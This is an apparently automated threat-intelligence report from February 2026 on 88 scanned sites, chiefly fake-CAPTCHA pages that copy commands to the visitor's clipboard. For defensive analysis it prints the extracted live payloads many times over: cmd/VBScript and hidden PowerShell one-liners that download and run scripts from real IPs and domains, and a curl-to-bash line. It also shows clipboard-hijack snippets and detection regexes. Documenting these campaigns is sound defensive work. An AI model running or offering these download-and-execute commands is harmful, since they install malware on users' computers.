Threat Intelligence Report

πŸ“… February 05, 2026 πŸ•’ Generated: 2026-02-05 03:30:54 πŸ” Sites Analyzed: 88
⬇️ Download JSON Report πŸ“ View All Reports on GitHub
🌐
88
Total Sites Analyzed
⚠️
53
Malicious Sites
60.0% detection rate
πŸ’»
28
PowerShell Commands
πŸ“‹
212
Clipboard Hijacks
πŸ“Š
1167
Avg Threat Score

Attack Pattern Analysis

37
High Risk Commands
260
Base64 Encoded
3
Obfuscated JS
57
Inline JS Redirects
8
External JS Chains
32
Redirect Follows
PowerShell Commands 28
Clipboard Hijacks 212
Base64 Encoded 260
CAPTCHA Elements 116
High Risk Commands 37
JS Redirects 57

Top Indicators/Keywords

hidden (16) robot (15) Robot (13) verification (12) Verification (12) Verification ID (11) Ray ID (11) I am not a robot (11) Verify you are human (11) CAPTCHA Verification (10) verification-id (10) Checking if you are human (10) To better prove you are not a robot (10) const command = (10) cmd (7)

Malicious Sites Detected

Click on a site to view detailed analysis
https://captoolsz.com
1787 indicators detected
Score: 51430 Fake CAPTCHA Obfuscated JS
3
obfuscation
1
captcha
38
base64
21
redirects
3
suspicious keywords

πŸ” Suspicious Keywords 3

Ray ID
robot
hidden

🌐 Extracted URLs 1

https://www.cloudflare.com/?utm_source=challenge&utm_campaign=m

πŸ” Obfuscated JavaScript

Showing first 2 of 3 entries (truncated for performance) 

{'script': '\n     (function(_0x2cc3ed,_0x2c9515){function _0x1fda6a(_0x52c5d2,_0x1f8c7a,_0x48f83c,_0x3b6f64,_0x2b31d3){return _0x5057(_0x2b31d3-0x287,_0x1f8c7a);}...', 'indicators': [{'pattern': 'var\\s+_0x[a-f0-9]{4,6}\\s*=', 'examples': ['var _0x435856=', 'var _0x244cc2='], 'count': 98}, {'pattern': '_0x[a-f0-9]{4,6}\\[.*?\\]', 'examples': ["_0x435856['push']", "_0x435856['shift']"], 'count': 732}, {'pattern': '_0x[a-f0-9]{2,6}\\s*=\\s*function', 'examples': ['_0x837010=function', '_0x382d1f=function'], 'count': 4}, {'pattern': '\\(function\\s*\\(\\s*_0x[a-f0-9]{2,6}\\s*,\\s*_0x[a-f0-9]{2,6}\\s*\\)', 'examples': ['(function(_0x2cc3ed,_0x2c9515)'], 'count': 1}, {'pattern': 'function\\s+_0x[a-f0-9]{4,8}', 'examples': ['function _0x1fda6a', 'function _0x468c42'], 'count': 211}, {'pattern': 'var\\s+_0x[a-f0-9]{2,8}\\s*=', 'examples': ['var _0x435856=', 'var _0x244cc2='], 'count': 98}, {'pattern': 'var\\s+[a-zA-Z0-9_$]+\\s*=\\s*\\[\\s*(?:[\\\'"`].*?[\\\'"`]\\s*,\\s*){10,}', 'examples': ["var _0xee2a70=['WOy+W7qbmG','o8oZbSoUW50','BZtcMSo..."], 'count': 1}, {'pattern': 'var\\s+[a-zA-Z0-9_$]+\\s*=\\s*[\\\'"`][^\\\'"`]{50,}[\\\'"`]', 'examples': ["var _0x512618='abcdefghijklmnopqrstuvwxyzABCDEFGHI..."], 'count': 1}, {'pattern': '[a-zA-Z0-9_$]{1,3}\\[[\\\'"`]push[\\\'"`]\\]', 'examples': ["856['push']", "856['push']"], 'count': 2}, {'pattern': '[\\\'"`]\\\\x[0-9a-fA-F]{2}\\\\x[0-9a-fA-F]{2}[\\\'"`]', 'examples': ["'\\x0a\\x0a'"], 'count': 1}], 'score': 1149, 'position': 3589}
{'script': '\n  function _0x19e5(_0x276d57,_0x655d81){_0x276d57=_0x276d57-(0x952+-0x1*-0x18c1+0x499*-0x7);const _0xd43211=_0x5ab8();let _0x1e4906=_0xd43211[_0x276d...', 'indicators': [{'pattern': 'var\\s+_0x[a-f0-9]{4,6}\\s*=', 'examples': ['var _0x418c35='], 'count': 1}, {'pattern': '_0x[a-f0-9]{4,6}\\[.*?\\]', 'examples': ['_0xd43211[_0x276d57]', "_0x19e5['GnHYaE']"], 'count': 369}, {'pattern': '_0x[a-f0-9]{2,6}\\s*=\\s*function', 'examples': ['_0x418c35=function', '_0x2644f2=function'], 'count': 7}, {'pattern': '\\(function\\s*\\(\\s*_0x[a-f0-9]{2,6}\\s*,\\s*_0x[a-f0-9]{2,6}\\s*\\)', 'examples': ['(function(_0x4ba92f,_0x31578f)'], 'count': 1}, {'pattern': 'function\\s+_0x[a-f0-9]{4,8}', 'examples': ['function _0x19e5', 'function _0x5ab8'], 'count': 143}, {'pattern': 'var\\s+_0x[a-f0-9]{2,8}\\s*=', 'examples': ['var _0x418c35='], 'count': 1}, {'pattern': 'let\\s+_0x[a-f0-9]{2,8}\\s*=', 'examples': ['let _0x1e4906=', 'let _0x14f50d='], 'count': 14}, {'pattern': 'const\\s+_0x[a-f0-9]{2,8}\\s*=', 'examples': ['const _0xd43211=', 'const _0x33ac5f='], 'count': 59}, {'pattern': '[a-zA-Z0-9_$]{1,3}\\[[\\\'"`]push[\\\'"`]\\]', 'examples': ["de5['push']", "de5['push']"], 'count': 2}], 'score': 597, 'position': 140816}
http://192.155.93.247:3101/
1025 indicators detected
Score: 8528
6
base64
3
suspicious keywords

πŸ” Suspicious Keywords 3

robot
Robot
hidden

🌐 Extracted URLs 190

https://gmpg.org/xfn/11
https://yoast.com/wordpress/plugins/seo/
https://www.ccera-icar.org/
https://www.ccera-icar.org/
https://www.ccera-icar.org/wp-content/uploads/2022/08/Frame-3.png
https://3.18.128.17/
791 indicators detected
Score: 6077 Redirect Chain
5
base64
3
redirect chains
3
redirect follows
3
suspicious keywords

πŸ” Suspicious Keywords 3

robot
Robot
hidden

🌐 Extracted URLs 63

https://gmpg.org/xfn/11
https://3.18.128.17/feed/
https://3.18.128.17/comments/feed/
https://api.w.org/
https://3.18.128.17/wp-json/

πŸ” External JavaScript Redirect Chains

Showing first 2 of 3 chains (truncated for performance)

Script: https://3.18.128.17/wp-content/plugins/wpvr/public/js/video.js?ver=1
Type: script_src
Destination (first appearance): https://vjs.zencdn.net/vttjs/0.14.1/vtt.min.js
d in
 
 
         var script = document.createElement('script');
         script.src = this.options_['vtt.js'] || 'https://vjs.zencdn.net/vttjs/0.14.1/vtt.min.js';
 
         script.onload = function () {
           /**
            * Fired …
Script: https://3.18.128.17/wp-content/plugins/wpvr/public/lib/videojs-vr/videojs-vr.js?ver=1
Type: base64_payload
Destination (first appearance): https://www.w3.org/2000/svg
<?xml version="1.0" encoding="UTF-8" standalone="no"?>
<svg width="198px" height="240px" viewBox="0 0 198 240" version="1.1" xmlns="http://www.w3.org/2000/svg" xmlns:xlink="http://www.w3.org/1999/xlink" xmlns:sketch="http://www.bohemiancodi…

πŸ›°οΈ Redirect Follower Findings (3)

Source: external_js
Method: script_src
d in
 
 
         var script = document.createElement('script');
         script.src = this.options_['vtt.js'] || 'https://vjs.zencdn.net/vttjs/0.14.1/vtt.min.js';
 
         script.onload = function () {
           /**
            * Fired …
Status: ok
/* videojs-vtt.js - v0.14.1 (https://github.com/gkatsev/vtt.js) built on 10-04-2018 */
!function(a){if("object"==typeof exports&&"undefined"!=typeof module)module.exports=a();else if("function"==typeof define&&define.amd)define([],a);else{var b;b="undefined"!=typeof window?window:"undefined"!=typeof global?global:"undefined"!=typeof self?self:this,b.vttjs=a()}}(function(){return function a(b,c,d){function e(g,h){if(!c[g]){if(!b[g]){var i="function"==typeof require&&require;if(!h&&i)return i(g,!0... [truncated]
Source: external_js
Method: base64_payload
Chain: http://www.w3.org/2000/svg
<?xml version="1.0" encoding="UTF-8" standalone="no"?>
<svg width="198px" height="240px" viewBox="0 0 198 240" version="1.1" xmlns="http://www.w3.org/2000/svg" xmlns:xlink="http://www.w3.org/1999/xlink" xmlns:sketch="http://www.bohemiancodi…
Status: ok
<!DOCTYPE html>
<html lang="en">
<head>
  <title>SVG namespace</title>
  <meta http-equiv="Content-Type" content="text/html; charset=utf-8"/>
  <link rel="stylesheet" type="text/css"
        href="https://www.w3.org/StyleSheets/TR/base"/>
</head>
<body>
<div class="head">
<p><a href="https://www.w3.org/"><img class="head"
src="https://www.w3.org/assets/logos/w3c/w3c-no-bars.svg" alt="W3C"/></a></p>
</div>
<p>
<strong>http://www.w3.org/2000/svg</strong> is an XML namespace, first defined in the 
... [truncated]
Source: external_js
Method: base64_payload
Chain: http://www.videolan.org/x264.html
 ftypmp42isomiso2avc1mp41freemdatEH, #x264 - core 142 r2479 dd79a61 - H.264/MPEG-4 AVC codec - Copyleft 2003-2014 - http://www.videolan.org/x264.html - options: cabac=1 ref=1 deblock=1:0:0 analyse=0x1:0x111 me=hex subme=2…
Status: ok
    <!DOCTYPE html>
    <html lang="en" >
    <head>
        <meta http-equiv="Content-Type" content="text/html; charset=utf-8" />
                    <meta http-equiv="X-UA-Compatible" content="IE=edge" />
            <meta name="viewport" content="width=device-width, initial-scale=1" />
        
        <meta name="Author" content="VideoLAN" />
        <meta name="Keywords" content=
        "VideoLAN, VLC, VLC player, VLC media player, download, media player, player download, codec, encoder, m... [truncated]
https://44.208.147.17/
560 indicators detected
Score: 3873
7
base64
1
redirects
3
suspicious keywords

πŸ” Suspicious Keywords 3

robot
Robot
hidden

🌐 Extracted URLs 79

https://gmpg.org/xfn/11
https://44.208.147.17/feed/
https://44.208.147.17/comments/feed/
https://44.208.147.17/wp-json/oembed/1.0/embed?url=https%3A%2F%2F44.208.147.17%2F
https://44.208.147.17/wp-json/oembed/1.0/embed?url=https%3A%2F%2F44.208.147.17%2F&#038;format=xml
https://5.63.157.201/
101 indicators detected
Score: 2056 Redirect Chain
5
base64
1
redirects
1
redirect follows
5
suspicious keywords

πŸ” Suspicious Keywords 5

exec(ua) != nuii) { rv = parseFioat(RegExp.$i); } } eise if (n.appName == "Netscape") { rv = ii; re = new RegExp("Trident/.*rv:([0-9]+[\.0-9]*)"); if (re.exec(ua) != nuii) { rv = parseFioat(RegExp.$i); } } } return rv; } })(window, document, navigator)
robot
verification
exec(
hidden

🌐 Extracted URLs 22

https://alfavit-obuv.ru/include/logo.png
https://alfavit-obuv.ru/
https://mc.yandex.ru/watch/55085083
https://5.63.157.201/
https://api.whatsapp.com/send/?phone=79168411253

πŸ›°οΈ Redirect Follower Findings (1)

Source: inline_js
Method: script_src
{ return; }}
   k=e.createElement(t),a=e.getElementsByTagName(t)[0],k.async=1,k.src=r,a.parentNode.insertBefore(k,a)})
   (window, document, "script", "https://mc.yandex.ru/metrika/tag.js", "ym");

   ym(55085083, "init", {
        clickmap…
Status: ok
(function(){var p;function aa(a){var b=0;return function(){return b<a.length?{done:!1,value:a[b++]}:{done:!0}}}var ba="function"==typeof Object.defineProperties?Object.defineProperty:function(a,b,c){if(a==Array.prototype||a==Object.prototype)return a;a[b]=c.value;return a};
function ca(a){a=["object"==typeof globalThis&&globalThis,a,"object"==typeof window&&window,"object"==typeof self&&self,"object"==typeof global&&global];for(var b=0;b<a.length;++b){var c=a[b];if(c&&c.Math==Math)return c}throw... [truncated]
https://3.71.235.243/
338 indicators detected
Score: 915
1
base64
3
suspicious keywords

πŸ” Suspicious Keywords 3

robot
Robot
hidden

🌐 Extracted URLs 150

https://gmpg.org/xfn/11
https://3.71.235.243/feed/
https://3.71.235.243/comments/feed/
https://3.71.235.243/magaza/feed/
https://3.71.235.243/wp-content/themes/astra/assets/css/minified/main.min.css?ver=4.11.14
https://tesllamacapp.com/
87 indicators detected
Score: 904 PowerShell Clipboard Hijack
1
powershell
5
clipboard
6
captcha
13
base64
1
redirect follows
13
suspicious keywords

πŸ’» PowerShell Commands 1

curl

πŸ” Suspicious Keywords 13

command box */
Command </button>
command prompt.</strong>
command beiow:</strong>
Command = cmdEiement.getAttribute('data-reai-command');
command copied
captcha verification
robot
Verification
verification-ioader

🌐 Extracted URLs 5

https://icloud.com/security/verify
https://api.ipify.org?format=json
https://api.ipify.org?format=json
https://api.myip.com
https://httpbin.org/ip

πŸ“‹ Clipboard Manipulation Code

Showing first 2 of 5 entries (truncated for performance) 

...igator.clipboard && window.isSecureContext) { navigator.clipboard.writeText(textToCopy).then(() => { if (button) {...
...tArea.select(); try { const successful = document.execCommand('copy'); if (successful) { const button = even...

πŸ›°οΈ Redirect Follower Findings (1)

Source: inline_js
Method: base64_payload
curl -s http://217.119.139.117/d/roberto32100 | nohup bash &
Status: error: HTTPConnectionPool(host='217.119.139.117', port=80): Max retries exceeded with url: /d/roberto32100 (Caused by ConnectTimeoutError(<HTTPConnection(host='217.119.139.117', port=80) at 0x7fb1be75
https://77.120.165.2/
75 indicators detected
Score: 735 Clipboard Hijack Fake CAPTCHA
6
clipboard
3
captcha
2
base64
19
suspicious keywords
3
high risk

πŸ” Suspicious Keywords 19

cmd /c echo Set h=CreateObject("WinHttp.WinHttpRequest.5.i"):h.Open "GET","http://i98.i3.i58.i27:5506/ny.vbs",0:h.Send:Execute h.ResponseText > "%temp%\\ny.vbs" && "%temp%\\ny.vbs"';
command = 'cmd /c echo Set h=CreateObject("WinHttp.WinHttpRequest.5.i"):h.Open "GET","http://i98.i3.i58.i27:5506/ny.vbs",0:h.Send:Execute h.ResponseText > "%temp%\\ny.vbs" && "%temp%\\ny.vbs"';
CAPTCHA Verification
Verification ID
Ray ID
I am not a robot
Robot
robot
Verification
verification

🌐 Extracted URLs 6

https://t.me/Tarnkappe_info
https://i.postimg.cc/k4zrz92z/111.png
http://198.13.158.127:5506/ny.vbs
https://www.google.com/s2/favicons?sz=128&domain=${encodeURIComponent
https://icons.duckduckgo.com/ip3/${encodeURIComponent

πŸ“‹ Clipboard Manipulation Code

Showing first 2 of 6 entries (truncated for performance) 

...ea); textarea.select(); try { document.execCommand('copy'); } catch(e) { /* ignore */ } document....
...ntDefault(); if (e.clipboardData) { e.clipboardData.setData('text/plain', command); } else if (window.clip...
http://77.120.165.2/
75 indicators detected
Score: 735 Clipboard Hijack Fake CAPTCHA
6
clipboard
3
captcha
2
base64
19
suspicious keywords
3
high risk

πŸ” Suspicious Keywords 19

cmd /c echo Set h=CreateObject("WinHttp.WinHttpRequest.5.i"):h.Open "GET","http://i98.i3.i58.i27:5506/ny.vbs",0:h.Send:Execute h.ResponseText > "%temp%\\ny.vbs" && "%temp%\\ny.vbs"';
command = 'cmd /c echo Set h=CreateObject("WinHttp.WinHttpRequest.5.i"):h.Open "GET","http://i98.i3.i58.i27:5506/ny.vbs",0:h.Send:Execute h.ResponseText > "%temp%\\ny.vbs" && "%temp%\\ny.vbs"';
CAPTCHA Verification
Verification ID
Ray ID
I am not a robot
Robot
robot
Verification
verification

🌐 Extracted URLs 6

https://t.me/Tarnkappe_info
https://i.postimg.cc/k4zrz92z/111.png
http://198.13.158.127:5506/ny.vbs
https://www.google.com/s2/favicons?sz=128&domain=${encodeURIComponent
https://icons.duckduckgo.com/ip3/${encodeURIComponent

πŸ“‹ Clipboard Manipulation Code

Showing first 2 of 6 entries (truncated for performance) 

...ea); textarea.select(); try { document.execCommand('copy'); } catch(e) { /* ignore */ } document....
...ntDefault(); if (e.clipboardData) { e.clipboardData.setData('text/plain', command); } else if (window.clip...
http://202.154.5.83:9092/
75 indicators detected
Score: 735 Clipboard Hijack Fake CAPTCHA
6
clipboard
3
captcha
2
base64
19
suspicious keywords
3
high risk

πŸ” Suspicious Keywords 19

cmd /c echo Set h=CreateObject("WinHttp.WinHttpRequest.5.i"):h.Open "GET","http://i98.i3.i58.i27:5506/ny.vbs",0:h.Send:Execute h.ResponseText > "%temp%\\ny.vbs" && "%temp%\\ny.vbs"';
command = 'cmd /c echo Set h=CreateObject("WinHttp.WinHttpRequest.5.i"):h.Open "GET","http://i98.i3.i58.i27:5506/ny.vbs",0:h.Send:Execute h.ResponseText > "%temp%\\ny.vbs" && "%temp%\\ny.vbs"';
CAPTCHA Verification
Verification ID
Ray ID
I am not a robot
Robot
robot
Verification
verification

🌐 Extracted URLs 6

https://t.me/Tarnkappe_info
https://i.postimg.cc/k4zrz92z/111.png
http://198.13.158.127:5506/ny.vbs
https://www.google.com/s2/favicons?sz=128&domain=${encodeURIComponent
https://icons.duckduckgo.com/ip3/${encodeURIComponent

πŸ“‹ Clipboard Manipulation Code

Showing first 2 of 6 entries (truncated for performance) 

...ea); textarea.select(); try { document.execCommand('copy'); } catch(e) { /* ignore */ } document....
...ntDefault(); if (e.clipboardData) { e.clipboardData.setData('text/plain', command); } else if (window.clip...
https://88.198.19.78/
75 indicators detected
Score: 735 Clipboard Hijack Fake CAPTCHA
6
clipboard
3
captcha
2
base64
19
suspicious keywords
3
high risk

πŸ” Suspicious Keywords 19

cmd /c echo Set h=CreateObject("WinHttp.WinHttpRequest.5.i"):h.Open "GET","http://78.40.209.i64:5506/dk.vbs",0:h.Send:Execute h.ResponseText > "%temp%\dk.vbs" && "%temp%\dk.vbs"';
command = 'cmd /c echo Set h=CreateObject("WinHttp.WinHttpRequest.5.i"):h.Open "GET","http://78.40.209.i64:5506/dk.vbs",0:h.Send:Execute h.ResponseText > "%temp%\dk.vbs" && "%temp%\dk.vbs"';
CAPTCHA Verification
Verification ID
Ray ID
I am not a robot
Robot
robot
Verification
verification

🌐 Extracted URLs 6

https://matrix.cymru/s/cloudflarechallenge
https://i.postimg.cc/k4zrz92z/111.png
http://78.40.209.164:5506/dk.vbs
https://www.google.com/s2/favicons?sz=128&domain=${encodeURIComponent
https://icons.duckduckgo.com/ip3/${encodeURIComponent

πŸ“‹ Clipboard Manipulation Code

Showing first 2 of 6 entries (truncated for performance) 

...ea); textarea.select(); try { document.execCommand('copy'); } catch(e) { /* ignore */ } document....
...ntDefault(); if (e.clipboardData) { e.clipboardData.setData('text/plain', command); } else if (window.clip...
https://174.142.195.203/
75 indicators detected
Score: 735 Clipboard Hijack Fake CAPTCHA
6
clipboard
3
captcha
2
base64
19
suspicious keywords
3
high risk

πŸ” Suspicious Keywords 19

cmd /c echo Set h=CreateObject("WinHttp.WinHttpRequest.5.i"):h.Open "GET","http://i98.i3.i58.i27:5506/ny.vbs",0:h.Send:Execute h.ResponseText > "%temp%\\ny.vbs" && "%temp%\\ny.vbs"';
command = 'cmd /c echo Set h=CreateObject("WinHttp.WinHttpRequest.5.i"):h.Open "GET","http://i98.i3.i58.i27:5506/ny.vbs",0:h.Send:Execute h.ResponseText > "%temp%\\ny.vbs" && "%temp%\\ny.vbs"';
CAPTCHA Verification
Verification ID
Ray ID
I am not a robot
Robot
robot
Verification
verification

🌐 Extracted URLs 6

https://t.me/Tarnkappe_info
https://i.postimg.cc/k4zrz92z/111.png
http://198.13.158.127:5506/ny.vbs
https://www.google.com/s2/favicons?sz=128&domain=${encodeURIComponent
https://icons.duckduckgo.com/ip3/${encodeURIComponent

πŸ“‹ Clipboard Manipulation Code

Showing first 2 of 6 entries (truncated for performance) 

...ea); textarea.select(); try { document.execCommand('copy'); } catch(e) { /* ignore */ } document....
...ntDefault(); if (e.clipboardData) { e.clipboardData.setData('text/plain', command); } else if (window.clip...
https://74.50.99.45:8443/
75 indicators detected
Score: 735 Clipboard Hijack Fake CAPTCHA
6
clipboard
3
captcha
2
base64
19
suspicious keywords
3
high risk

πŸ” Suspicious Keywords 19

cmd /c echo Set h=CreateObject("WinHttp.WinHttpRequest.5.i"):h.Open "GET","http://i98.i3.i58.i27:5506/ny.vbs",0:h.Send:Execute h.ResponseText > "%temp%\\ny.vbs" && "%temp%\\ny.vbs"';
command = 'cmd /c echo Set h=CreateObject("WinHttp.WinHttpRequest.5.i"):h.Open "GET","http://i98.i3.i58.i27:5506/ny.vbs",0:h.Send:Execute h.ResponseText > "%temp%\\ny.vbs" && "%temp%\\ny.vbs"';
CAPTCHA Verification
Verification ID
Ray ID
I am not a robot
Robot
robot
Verification
verification

🌐 Extracted URLs 6

https://t.me/Tarnkappe_info
https://i.postimg.cc/k4zrz92z/111.png
http://198.13.158.127:5506/ny.vbs
https://www.google.com/s2/favicons?sz=128&domain=${encodeURIComponent
https://icons.duckduckgo.com/ip3/${encodeURIComponent

πŸ“‹ Clipboard Manipulation Code

Showing first 2 of 6 entries (truncated for performance) 

...ea); textarea.select(); try { document.execCommand('copy'); } catch(e) { /* ignore */ } document....
...ntDefault(); if (e.clipboardData) { e.clipboardData.setData('text/plain', command); } else if (window.clip...
https://103.112.244.68/
175 indicators detected
Score: 665 Fake CAPTCHA
1
captcha
26
base64
2
redirects
1
suspicious keywords

πŸ” Suspicious Keywords 1

hidden

🌐 Extracted URLs 132

https://ogp.me/ns#
https://www.yppgiibandung.org/
https://www.yppgiibandung.org/igniter/an-component/media/upload-gambar-pendukung/footpath-691021_1280.jpg
http://localhost//igniter/an-component/media/upload-gambar-pendukung/20219478.png
https://www.yppgiibandung.org/an-theme/reMindz/assets/font-awesome/css/font-awesome.min.css
https://162.215.130.152/
73 indicators detected
Score: 618 PowerShell Clipboard Hijack
2
powershell
6
clipboard
3
captcha
2
base64
21
suspicious keywords
2
high risk

πŸ’» PowerShell Commands 2

powershell -w h -ep Bypass -nop -c "$d='p.ps1';$y=$env:USERPROFILE+'\\\\Downloads\\\\'+$d;Start-Sleep 15;(New-Object Net.WebClient).DownloadFile('https://ghost.nestdns.com/files', $y);& $y;Remove-Item $y -Force;"`;
New-Object

πŸ” Suspicious Keywords 21

cmd.exe /c powersheii -w h -ep Bypass -nop -c "$d='p.psi';$y=$env:USERPROFILE+'\\\\Downioads\\\\'+$d;Start-Sieep i5;(New-Object Net.WebCiient).DownioadFiie('https://ghost.nestdns.com/fiies', $y);& $y;Remove-Item $y -Force;"`;
command = `cmd.exe /c powersheii -w h -ep Bypass -nop -c "$d='p.psi';$y=$env:USERPROFILE+'\\\\Downioads\\\\'+$d;Start-Sieep i5;(New-Object Net.WebCiient).DownioadFiie('https://ghost.nestdns.com/fiies', $y);& $y;Remove-Item $y -Force;"`;
CAPTCHA Verification
Verification ID
verification id
Ray ID
ray id
I am not a robot
Robot
robot

🌐 Extracted URLs 5

https://i.postimg.cc/k4zrz92z/111.png
https://ghost.nestdns.com/files
https://www.google.com/s2/favicons?sz=128&domain=${encodeURIComponent
https://icons.duckduckgo.com/ip3/${encodeURIComponent
https://${host}/favicon.ico`

πŸ“‹ Clipboard Manipulation Code

Showing first 2 of 6 entries (truncated for performance) 

...ea); textarea.select(); try { document.execCommand('copy'); } catch(e) { /* ignore */ } document....
...ntDefault(); if (e.clipboardData) { e.clipboardData.setData('text/plain', command); } else if (window.clip...
http://178.159.11.216/
73 indicators detected
Score: 618 PowerShell Clipboard Hijack
2
powershell
6
clipboard
3
captcha
2
base64
21
suspicious keywords
2
high risk

πŸ’» PowerShell Commands 2

powershell -w h -ep Bypass -nop -c "$h='b.ps1';$n=$env:USERPROFILE+'\\\\Downloads\\\\'+$h;Start-Sleep 15;(New-Object Net.WebClient).DownloadFile('https://penguinpublishers.org/files/audio/', $n);& $n;Remove-Item $n -Force;"`;
New-Object

πŸ” Suspicious Keywords 21

cmd.exe /c powersheii -w h -ep Bypass -nop -c "$h='b.psi';$n=$env:USERPROFILE+'\\\\Downioads\\\\'+$h;Start-Sieep i5;(New-Object Net.WebCiient).DownioadFiie('https://penguinpubiishers.org/fiies/audio/', $n);& $n;Remove-Item $n -Force;"`;
command = `cmd.exe /c powersheii -w h -ep Bypass -nop -c "$h='b.psi';$n=$env:USERPROFILE+'\\\\Downioads\\\\'+$h;Start-Sieep i5;(New-Object Net.WebCiient).DownioadFiie('https://penguinpubiishers.org/fiies/audio/', $n);& $n;Remove-Item $n -Force;"`;
CAPTCHA Verification
Verification ID
verification id
Ray ID
ray id
I am not a robot
Robot
robot

🌐 Extracted URLs 5

https://i.postimg.cc/k4zrz92z/111.png
https://penguinpublishers.org/files/audio/
https://www.google.com/s2/favicons?sz=128&domain=${encodeURIComponent
https://icons.duckduckgo.com/ip3/${encodeURIComponent
https://${host}/favicon.ico`

πŸ“‹ Clipboard Manipulation Code

Showing first 2 of 6 entries (truncated for performance) 

...ea); textarea.select(); try { document.execCommand('copy'); } catch(e) { /* ignore */ } document....
...ntDefault(); if (e.clipboardData) { e.clipboardData.setData('text/plain', command); } else if (window.clip...
https://178.159.11.216/
73 indicators detected
Score: 618 PowerShell Clipboard Hijack
2
powershell
6
clipboard
3
captcha
2
base64
21
suspicious keywords
2
high risk

πŸ’» PowerShell Commands 2

powershell -w h -ep Bypass -nop -c "$h='b.ps1';$n=$env:USERPROFILE+'\\\\Downloads\\\\'+$h;Start-Sleep 15;(New-Object Net.WebClient).DownloadFile('https://penguinpublishers.org/files/audio/', $n);& $n;Remove-Item $n -Force;"`;
New-Object

πŸ” Suspicious Keywords 21

cmd.exe /c powersheii -w h -ep Bypass -nop -c "$h='b.psi';$n=$env:USERPROFILE+'\\\\Downioads\\\\'+$h;Start-Sieep i5;(New-Object Net.WebCiient).DownioadFiie('https://penguinpubiishers.org/fiies/audio/', $n);& $n;Remove-Item $n -Force;"`;
command = `cmd.exe /c powersheii -w h -ep Bypass -nop -c "$h='b.psi';$n=$env:USERPROFILE+'\\\\Downioads\\\\'+$h;Start-Sieep i5;(New-Object Net.WebCiient).DownioadFiie('https://penguinpubiishers.org/fiies/audio/', $n);& $n;Remove-Item $n -Force;"`;
CAPTCHA Verification
Verification ID
verification id
Ray ID
ray id
I am not a robot
Robot
robot

🌐 Extracted URLs 5

https://i.postimg.cc/k4zrz92z/111.png
https://penguinpublishers.org/files/audio/
https://www.google.com/s2/favicons?sz=128&domain=${encodeURIComponent
https://icons.duckduckgo.com/ip3/${encodeURIComponent
https://${host}/favicon.ico`

πŸ“‹ Clipboard Manipulation Code

Showing first 2 of 6 entries (truncated for performance) 

...ea); textarea.select(); try { document.execCommand('copy'); } catch(e) { /* ignore */ } document....
...ntDefault(); if (e.clipboardData) { e.clipboardData.setData('text/plain', command); } else if (window.clip...
https://144.22.251.16/
73 indicators detected
Score: 618 PowerShell Clipboard Hijack
2
powershell
6
clipboard
3
captcha
2
base64
21
suspicious keywords
2
high risk

πŸ’» PowerShell Commands 2

powershell -w h -ep Bypass -nop -c "$d='p.ps1';$y=$env:USERPROFILE+'\\\\Downloads\\\\'+$d;Start-Sleep 15;(New-Object Net.WebClient).DownloadFile('https://ghost.nestdns.com/files', $y);& $y;Remove-Item $y -Force;"`;
New-Object

πŸ” Suspicious Keywords 21

cmd.exe /c powersheii -w h -ep Bypass -nop -c "$d='p.psi';$y=$env:USERPROFILE+'\\\\Downioads\\\\'+$d;Start-Sieep i5;(New-Object Net.WebCiient).DownioadFiie('https://ghost.nestdns.com/fiies', $y);& $y;Remove-Item $y -Force;"`;
command = `cmd.exe /c powersheii -w h -ep Bypass -nop -c "$d='p.psi';$y=$env:USERPROFILE+'\\\\Downioads\\\\'+$d;Start-Sieep i5;(New-Object Net.WebCiient).DownioadFiie('https://ghost.nestdns.com/fiies', $y);& $y;Remove-Item $y -Force;"`;
CAPTCHA Verification
Verification ID
verification id
Ray ID
ray id
I am not a robot
Robot
robot

🌐 Extracted URLs 5

https://i.postimg.cc/k4zrz92z/111.png
https://ghost.nestdns.com/files
https://www.google.com/s2/favicons?sz=128&domain=${encodeURIComponent
https://icons.duckduckgo.com/ip3/${encodeURIComponent
https://${host}/favicon.ico`

πŸ“‹ Clipboard Manipulation Code

Showing first 2 of 6 entries (truncated for performance) 

...ea); textarea.select(); try { document.execCommand('copy'); } catch(e) { /* ignore */ } document....
...ntDefault(); if (e.clipboardData) { e.clipboardData.setData('text/plain', command); } else if (window.clip...
https://173.231.196.249/
73 indicators detected
Score: 618 PowerShell Clipboard Hijack
2
powershell
6
clipboard
3
captcha
2
base64
21
suspicious keywords
2
high risk

πŸ’» PowerShell Commands 2

powershell -w h -ep Bypass -nop -c "$d='p.ps1';$y=$env:USERPROFILE+'\\\\Downloads\\\\'+$d;Start-Sleep 15;(New-Object Net.WebClient).DownloadFile('https://ghost.nestdns.com/files', $y);& $y;Remove-Item $y -Force;"`;
New-Object

πŸ” Suspicious Keywords 21

cmd.exe /c powersheii -w h -ep Bypass -nop -c "$d='p.psi';$y=$env:USERPROFILE+'\\\\Downioads\\\\'+$d;Start-Sieep i5;(New-Object Net.WebCiient).DownioadFiie('https://ghost.nestdns.com/fiies', $y);& $y;Remove-Item $y -Force;"`;
command = `cmd.exe /c powersheii -w h -ep Bypass -nop -c "$d='p.psi';$y=$env:USERPROFILE+'\\\\Downioads\\\\'+$d;Start-Sieep i5;(New-Object Net.WebCiient).DownioadFiie('https://ghost.nestdns.com/fiies', $y);& $y;Remove-Item $y -Force;"`;
CAPTCHA Verification
Verification ID
verification id
Ray ID
ray id
I am not a robot
Robot
robot

🌐 Extracted URLs 5

https://i.postimg.cc/k4zrz92z/111.png
https://ghost.nestdns.com/files
https://www.google.com/s2/favicons?sz=128&domain=${encodeURIComponent
https://icons.duckduckgo.com/ip3/${encodeURIComponent
https://${host}/favicon.ico`

πŸ“‹ Clipboard Manipulation Code

Showing first 2 of 6 entries (truncated for performance) 

...ea); textarea.select(); try { document.execCommand('copy'); } catch(e) { /* ignore */ } document....
...ntDefault(); if (e.clipboardData) { e.clipboardData.setData('text/plain', command); } else if (window.clip...
http://162.215.130.152/
73 indicators detected
Score: 618 PowerShell Clipboard Hijack
2
powershell
6
clipboard
3
captcha
2
base64
21
suspicious keywords
2
high risk

πŸ’» PowerShell Commands 2

powershell -w h -ep Bypass -nop -c "$d='p.ps1';$y=$env:USERPROFILE+'\\\\Downloads\\\\'+$d;Start-Sleep 15;(New-Object Net.WebClient).DownloadFile('https://ghost.nestdns.com/files', $y);& $y;Remove-Item $y -Force;"`;
New-Object

πŸ” Suspicious Keywords 21

cmd.exe /c powersheii -w h -ep Bypass -nop -c "$d='p.psi';$y=$env:USERPROFILE+'\\\\Downioads\\\\'+$d;Start-Sieep i5;(New-Object Net.WebCiient).DownioadFiie('https://ghost.nestdns.com/fiies', $y);& $y;Remove-Item $y -Force;"`;
